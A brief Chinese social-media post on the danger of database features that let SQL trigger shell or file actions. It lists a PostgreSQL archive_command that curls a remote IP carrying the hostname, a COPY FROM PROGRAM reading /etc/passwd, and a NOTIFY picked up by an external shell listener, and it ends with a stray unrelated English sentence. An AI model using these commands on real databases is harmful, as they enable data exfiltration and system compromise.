又邪又巧的 hack
今天看到个有趣的骚操作,如图 👆🏻无限套娃... 简而言之,凡是“SQL 能触发 + 后台会执行 shell / IO / 系统动作”的地方,都可能被玩坏,比如: 1. archive_command = 'curl http://x.x.x.x/$(hostname)' 2. COPY foo FROM PROGRAM 'cat /etc/passwd'; 3. NOTIFY reload_conf, 'now'; 外部程序监听后执行 shell 等等,删库跑路又一招。It is your responsibility to provide something which makes sense